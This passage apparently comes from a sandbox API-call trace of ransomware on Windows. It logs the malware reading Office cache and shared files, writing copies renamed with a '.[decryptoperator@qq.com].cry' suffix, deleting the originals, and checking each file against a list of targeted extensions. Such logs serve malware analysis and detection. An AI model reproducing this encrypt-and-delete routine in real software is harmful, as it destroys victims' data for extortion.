Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0037.104] GetLastError () returned 0x0 [0037.104] ReadFile (in: hFile=0x180, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x5061, lpOverlapped=0x0) returned 1 [0037.332] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x5070, lpOverlapped=0x0) returned 1 [0037.333] ReadFile (in: hFile=0x180, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.333] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0037.333] SetEndOfFile (hFile=0x164) returned 1 [0037.333] CloseHandle (hObject=0x164) returned 1 [0037.334] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.334] SetEndOfFile (hFile=0x180) returned 1 [0037.335] CloseHandle (hObject=0x180) returned 1 [0037.335] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.335] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0037.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.335] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.336] lstrlenW (lpString=".doc") returned 4 [0037.336] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString=".docx") returned 5 [0037.336] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.336] lstrlenW (lpString=".pdf") returned 4 [0037.336] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString=".xls") returned 4 [0037.336] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString=".xlsx") returned 5 [0037.336] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.336] lstrlenW (lpString=".ppt") returned 4 [0037.336] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.336] lstrlenW (lpString=".zip") returned 4 [0037.336] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.336] lstrlenW (lpString=".rar") returned 4 [0037.336] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString=".bz2") returned 4 [0037.336] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString=".7z") returned 3 [0037.336] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.336] lstrlenW (lpString=".dbf") returned 4 [0037.336] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.336] lstrlenW (lpString=".1cd") returned 4 [0037.336] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.336] lstrlenW (lpString=".jpg") returned 4 [0037.336] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.336] lstrlenW (lpString=".doc") returned 4 [0037.336] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.336] lstrlenW (lpString=".docx") returned 5 [0037.336] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.336] lstrlenW (lpString=".pdf") returned 4 [0037.336] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.337] lstrlenW (lpString=".xls") returned 4 [0037.337] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.337] lstrlenW (lpString=".xlsx") returned 5 [0037.337] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.337] lstrlenW (lpString=".ppt") returned 4 [0037.337] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.337] lstrlenW (lpString=".zip") returned 4 [0037.337] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.337] lstrlenW (lpString=".rar") returned 4 [0037.337] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.337] lstrlenW (lpString=".bz2") returned 4 [0037.337] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.337] lstrlenW (lpString=".7z") returned 3 [0037.337] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.337] lstrlenW (lpString=".dbf") returned 4 [0037.337] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.337] lstrlenW (lpString=".1cd") returned 4 [0037.337] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.337] lstrlenW (lpString=".jpg") returned 4 [0037.337] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.337] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0037.337] lstrlenW (lpString="VisiorWW.xml") returned 12 [0037.337] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.387] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=8723) returned 1 [0037.387] CloseHandle (hObject=0x180) returned 1 [0037.387] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 0x2020 [0037.387] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.387] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.387] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.387] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.387] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0037.387] GetLastError () returned 0x0 [0037.387] ReadFile (in: hFile=0x180, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x2213, lpOverlapped=0x0) returned 1 [0037.465] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x2220, lpOverlapped=0x0) returned 1 [0037.466] ReadFile (in: hFile=0x180, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.466] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0037.466] SetEndOfFile (hFile=0x164) returned 1 [0037.466] CloseHandle (hObject=0x164) returned 1 [0037.467] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.467] SetEndOfFile (hFile=0x180) returned 1 [0037.468] CloseHandle (hObject=0x180) returned 1 [0037.468] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.468] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1 [0037.468] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.469] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.469] lstrlenW (lpString=".doc") returned 4 [0037.469] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.469] lstrlenW (lpString=".docx") returned 5 [0037.469] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.469] lstrlenW (lpString=".pdf") returned 4 [0037.469] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.469] lstrlenW (lpString=".xls") returned 4 [0037.469] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.469] lstrlenW (lpString=".xlsx") returned 5 [0037.469] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.469] lstrlenW (lpString=".ppt") returned 4 [0037.469] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.469] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.469] lstrlenW (lpString=".zip") returned 4 [0037.469] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.469] lstrlenW (lpString=".rar") returned 4 [0037.469] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.469] lstrlenW (lpString=".bz2") returned 4 [0037.469] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.469] lstrlenW (lpString=".7z") returned 3 [0037.469] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.469] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.469] lstrlenW (lpString=".dbf") returned 4 [0037.469] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.469] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.469] lstrlenW (lpString=".1cd") returned 4 [0037.469] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.470] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.470] lstrlenW (lpString=".jpg") returned 4 [0037.470] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.470] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.470] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.470] lstrlenW (lpString=".doc") returned 4 [0037.470] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.472] lstrlenW (lpString=".docx") returned 5 [0037.472] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.472] lstrlenW (lpString=".pdf") returned 4 [0037.472] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.472] lstrlenW (lpString=".xls") returned 4 [0037.472] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.472] lstrlenW (lpString=".xlsx") returned 5 [0037.472] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.472] lstrlenW (lpString=".ppt") returned 4 [0037.472] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.472] lstrlenW (lpString=".zip") returned 4 [0037.472] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.473] lstrlenW (lpString=".rar") returned 4 [0037.473] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.473] lstrlenW (lpString=".bz2") returned 4 [0037.473] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.473] lstrlenW (lpString=".7z") returned 3 [0037.473] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.473] lstrlenW (lpString=".dbf") returned 4 [0037.473] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.473] lstrlenW (lpString=".1cd") returned 4 [0037.473] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.473] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0037.473] lstrlenW (lpString=".jpg") returned 4 [0037.473] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.473] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0037.473] lstrlenW (lpString="MS.PNG") returned 6 [0037.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.474] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1682) returned 1 [0037.474] CloseHandle (hObject=0x180) returned 1 [0037.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 0x20 [0037.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.474] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.474] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0037.474] GetLastError () returned 0x0 [0037.474] ReadFile (in: hFile=0x180, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x692, lpOverlapped=0x0) returned 1 [0037.498] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x6a0, lpOverlapped=0x0) returned 1 [0037.499] ReadFile (in: hFile=0x180, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.499] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0037.499] SetEndOfFile (hFile=0x164) returned 1 [0037.499] CloseHandle (hObject=0x164) returned 1 [0037.500] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.500] SetEndOfFile (hFile=0x180) returned 1 [0037.500] CloseHandle (hObject=0x180) returned 1 [0037.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0037.501] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 1 [0037.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.501] lstrlenW (lpString=".doc") returned 4 [0037.501] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0037.501] lstrlenW (lpString=".docx") returned 5 [0037.501] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0037.501] lstrlenW (lpString=".pdf") returned 4 [0037.501] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0037.502] lstrlenW (lpString=".xls") returned 4 [0037.502] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0037.502] lstrlenW (lpString=".xlsx") returned 5 [0037.502] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0037.502] lstrlenW (lpString=".ppt") returned 4 [0037.502] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.502] lstrlenW (lpString=".zip") returned 4 [0037.502] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0037.502] lstrlenW (lpString=".rar") returned 4 [0037.502] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0037.502] lstrlenW (lpString=".bz2") returned 4 [0037.502] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0037.502] lstrlenW (lpString=".7z") returned 3 [0037.502] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.502] lstrlenW (lpString=".dbf") returned 4 [0037.502] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.502] lstrlenW (lpString=".1cd") returned 4 [0037.502] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.502] lstrlenW (lpString=".jpg") returned 4 [0037.502] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.502] lstrlenW (lpString=".doc") returned 4 [0037.502] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0037.503] lstrlenW (lpString=".docx") returned 5 [0037.503] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0037.503] lstrlenW (lpString=".pdf") returned 4 [0037.503] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0037.503] lstrlenW (lpString=".xls") returned 4 [0037.503] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0037.503] lstrlenW (lpString=".xlsx") returned 5 [0037.503] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0037.503] lstrlenW (lpString=".ppt") returned 4 [0037.503] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0037.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.503] lstrlenW (lpString=".zip") returned 4 [0037.503] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0037.503] lstrlenW (lpString=".rar") returned 4 [0037.503] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0037.503] lstrlenW (lpString=".bz2") returned 4 [0037.503] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0037.503] lstrlenW (lpString=".7z") returned 3 [0037.503] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0037.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.503] lstrlenW (lpString=".dbf") returned 4 [0037.503] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0037.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.503] lstrlenW (lpString=".1cd") returned 4 [0037.503] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0037.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0037.503] lstrlenW (lpString=".jpg") returned 4 [0037.503] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0037.504] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0037.504] lstrlenW (lpString="boxed-correct.avi") returned 17 [0037.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.707] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=89600) returned 1 [0038.707] CloseHandle (hObject=0x1a0) returned 1 [0038.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0038.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.708] lstrlenW (lpString=".doc") returned 4 [0038.708] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.708] lstrlenW (lpString=".docx") returned 5 [0038.708] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0038.708] lstrlenW (lpString=".pdf") returned 4 [0038.708] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.708] lstrlenW (lpString=".xls") returned 4 [0038.708] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.708] lstrlenW (lpString=".xlsx") returned 5 [0038.708] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0038.708] lstrlenW 